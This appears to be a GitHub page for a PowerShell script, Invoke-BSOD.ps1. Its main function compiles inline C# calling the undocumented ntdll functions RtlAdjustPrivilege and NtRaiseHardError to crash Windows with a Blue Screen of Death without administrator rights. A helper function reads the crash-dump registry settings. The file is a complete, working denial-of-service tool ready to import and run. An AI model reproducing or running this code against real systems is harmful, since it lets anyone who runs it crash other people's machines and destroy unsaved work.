-
Notifications
You must be signed in to change notification settings - Fork 71
/
Copy pathInvoke-BSOD.ps1
80 lines (63 loc) · 2.34 KB
/
Invoke-BSOD.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
function Invoke-BSOD {
<#
.SYNOPSIS
Invokes a Blue Screen of Death on Windows without requiring admin privileges.
Author: Barrett Adams (@peewpw)
.DESCRIPTION
Raises an error that causes a Blue Screen of Death on Windows. It does this without
requiring administrator privileges.
.EXAMPLE
PS>Import-Module .\Invoke-BSOD.ps1
PS>Invoke-BSOD
(Blue Screen Incoming...)
#>
$source = @"
using System;
using System.Runtime.InteropServices;
public static class CS{
[DllImport("ntdll.dll")]
public static extern uint RtlAdjustPrivilege(int Privilege, bool bEnablePrivilege, bool IsThreadPrivilege, out bool PreviousValue);
[DllImport("ntdll.dll")]
public static extern uint NtRaiseHardError(uint ErrorStatus, uint NumberOfParameters, uint UnicodeStringParameterMask, IntPtr Parameters, uint ValidResponseOption, out uint Response);
public static unsafe void Kill(){
Boolean tmp1;
uint tmp2;
RtlAdjustPrivilege(19, true, false, out tmp1);
NtRaiseHardError(0xc0000022, 0, 0, IntPtr.Zero, 6, out tmp2);
}
}
"@
$comparams = new-object -typename system.CodeDom.Compiler.CompilerParameters
$comparams.CompilerOptions = '/unsafe'
$a = Add-Type -TypeDefinition $source -Language CSharp -PassThru -CompilerParameters $comparams
[CS]::Kill()
}
function Get-DumpSettings {
<#
.SYNOPSIS
Gets the crash dump settings
Author: Barrett Adams (@peewpw)
.DESCRIPTION
Queries the registry for crash dump settings so that you'll have some idea
what type of dump you're going to generate, and where it will be.
.EXAMPLE
PS>Import-Module .\Invoke-BSOD.ps1
PS>Invoke-BSOD
(Blue Screen Incoming...)
#>
$regdata = Get-ItemProperty -path HKLM:\System\CurrentControlSet\Control\CrashControl
$dumpsettings = @{}
$dumpsettings.CrashDumpMode = switch ($regdata.CrashDumpEnabled) {
1 { if ($regdata.FilterPages) { "Active Memory Dump" } else { "Complete Memory Dump" } }
2 {"Kernel Memory Dump"}
3 {"Small Memory Dump"}
7 {"Automatic Memory Dump"}
default {"Unknown"}
}
$dumpsettings.DumpFileLocation = $regdata.DumpFile
[bool]$dumpsettings.AutoReboot = $regdata.AutoReboot
[bool]$dumpsettings.OverwritePrevious = $regdata.Overwrite
[bool]$dumpsettings.AutoDeleteWhenLowSpace = -not $regdata.AlwaysKeepMemoryDump
[bool]$dumpsettings.SystemLogEvent = $regdata.LogEvent
$dumpsettings
}